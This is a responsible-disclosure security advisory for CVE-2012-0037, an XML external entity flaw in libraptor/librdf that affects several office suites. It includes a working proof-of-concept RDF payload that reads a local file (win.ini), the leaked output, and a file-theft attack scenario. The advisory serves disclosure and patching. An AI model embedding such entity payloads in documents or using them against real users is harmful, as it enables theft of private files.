libraptor - XXE in RDF/XML File Interpretation
|Application||libraptor / librdf (versions 1.x and 2.x)|
|Also Affected||OpenOffice 3.x, LibreOffice 3.x, AbiWord, KOffice|
|Discovered by||Timothy D. Morgan <tmorgan (a) vsecurity.com>|
|Vendor Status||Patches available; major downstream vendors and operating system distributions notified|
"Raptor is a free software / Open Source C library that provides a set of parsers and serializers that generate Resource Description Framework (RDF) triples by parsing syntaxes or serialize the triples into a syntax. The supported parsing syntaxes are RDF/XML, N-Quads, N-Triples, TRiG, Turtle, RSS tag soup including all versions of RSS, Atom 1.0 and 0.3, GRDDL and microformats for HTML, XHTML and XML and RDFa. The serializing syntaxes are RDF/XML (regular, and abbreviated), Atom 1.0, GraphViz, JSON, N-Quads, N-Triples, RSS 1.0 and XMP." -- libraptor web site 
In December 2011, VSR identified a vulnerability in multiple open source office products (including OpenOffice, LibreOffice, KOffice, and AbiWord) due to unsafe interpretation of XML files with custom entity declarations. Deeper analysis revealed that the vulnerability was caused by acceptance of external entities by the libraptor library, which is used by librdf and is in turn used by these office products.
In the context of office applications, these vulnerabilities could allow for XML External Entity (XXE) attacks resulting in file theft and a loss of user privacy when opening potentially malicious ODF documents. For other applications which depend on librdf or libraptor, potentially serious consequences could result from accepting RDF/XML content from untrusted sources, though the impact may vary widely depending on the context.
Open Document Format (ODF) files consist of a collection of several different
files stored in a ZIP archive. Included in this set is a "
which is formatted according to the RDF/XML representation. The RDF format is
intended to be used for storing metadata associated with specific document
manifest.rdf file can reference secondary RDF files within the
ODF file as well as external document schemas.
The RDF file parser (librdf) used by the affected office products allows DTD specifications within the RDF files themselves. In addition, the parser interprets external entities which may reference arbitrary external files, HTTP and FTP resources.
For instance, the following "
evil.rdf" file was created within a valid ODF text
.odt file) which was referenced by the internal
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE rdf [ <!ENTITY file SYSTEM "file:///c:/windows/win.ini"> ]> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="content.xml#id1265690860"> <ns0:comment xmlns:ns0="http://www.w3.org/2000/01/rdf-schema#">&file;</ns0:comment> </rdf:Description> </rdf:RDF>
Upon opening the malicious .odt file in OpenOffice for Windows, the
c:\windows\win.ini file was read and included in the document metadata. Upon
saving the document, this metadata was included literally in the resulting
evil.rdf file (within the
<?xml version="1.0" encoding="utf-8"?> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="content.xml#id1265690860"> <ns1:comment xmlns:ns1="http://www.w3.org/2000/01/rdf-schema#">; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMC=1 MAPIX=1 MAPIXVER=220.127.116.11 OLEMessaging=1 </ns1:comment> </rdf:Description> </rdf:RDF>
The malicious XML entities could also include URLs to attacker-controlled HTTP or FTP resources. This would allow an attacker to determine when a document was opened, potentially resulting in reduced privacy. However, based on current analysis of the affected office applications, the most serious attack scenario is likely to be:
- Attacker posts a malicious file on a web site or sends file to victim. The file contains a form for the victim to fill out and return to the attacker.
- Victim fills out the form, saves it, sends it back to the attacker.
- Attacker is able to read the contents of any stolen files as embedded metadata, simply by unzipping the returned file and reading the malicious RDF component.
This attack clearly requires some significant user interaction. However, other applications which rely on librdf/libraptor have not been analyzed. It is plausible that the context of the external entity interpretation in other software could allow for more serious automated file retrieval attacks.
The 1.x and 2.x major versions of librdf are affected.
Thus far, all recent versions of open source office products appear to be affected, since these products rely on librdf/raptor for the interpretation of RDF files. This, in turn relies on libxml2 which supports external entity interpretation by default. OpenOffice and LibreOffice include a modified copy of librdf 1.x which was vulnerable at the time of testing. It is likely that all previously release 3.x versions of OpenOffice and LibreOffice are vulnerable. AbiWord and KOffice rely on a copy of librdf which is installed by the underlying operating system.
Numerous other open source software packages depend on librdf or libraptor (including ardour, libslv2, lv2file, morla, soprano, and numerous language-specific wrappers), but it is not known if these are exploitable in any realistic scenario.
The following timeline provides an overview of communication with the primary affected vendors:
|2012-01-09||OpenOffice, LibreOffice, AbiWord, KOffice, and libraptor maintainers were provided a draft advisory and test sample. The OpenWall "distros" mailing list was also notified. Apache OpenOffice Security team acknowledged notification. libraptor developer confirmed flaw.|
|2012-01-10||CVE-2012-0037 assigned by Apache.|
|2012-02-02||Notified OpenWall "distros" mailing list again, due to previous technical problems.|
|2012-02-04||libraptor developer provided patches to all notified parties.|
|2012-02-22||Extensive arguing between vendors about embargo/release date.|
|2012-03-06||More arguing about release date.|
|2012-03-14||Agreed upon release date established.|
|2012-03-22||Security updates and vendor advisories released.|
|2012-03-24||VSR advisory released.|
Users of most open source operating system distributions should update to the latest librdf package as soon as possible, once a patched version is available for their distribution. OpenOffice and LibreOffice packages should also be upgraded, since these include a custom copy of the library.
Users of other operating systems who use LibreOffice or OpenOffice should upgrade these packages to the latest release versions as soon as possible.
Developers of software which rely on librdf or libraptor should assess the risk of XXE attacks on interpreted XML files and take appropriate actions to notify their users based on how their software operates. VSR would be happy to assist developers in these efforts on a case-by-case basis.
Common Vulnerabilities and Exposures (CVE) Information
The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2012-0037 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.
Thanks to Leper for help in preliminary testing.
Thanks to Jan iankko Lieskovsky, Daniel Veillard, Caolán McNamara, and Michael Stahl for performing deeper analysis on the interaction between libraptor and libxml2.
This advisory is distributed for educational purposes only with the sincere hope that it will help promote public safety. This advisory comes with absolutely NO WARRANTY; not even the implied warranty of merchantability or fitness for a particular purpose. Neither Virtual Security Research, LLC nor the author accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
See the VSR disclosure policy for more information on our responsible disclosure practices.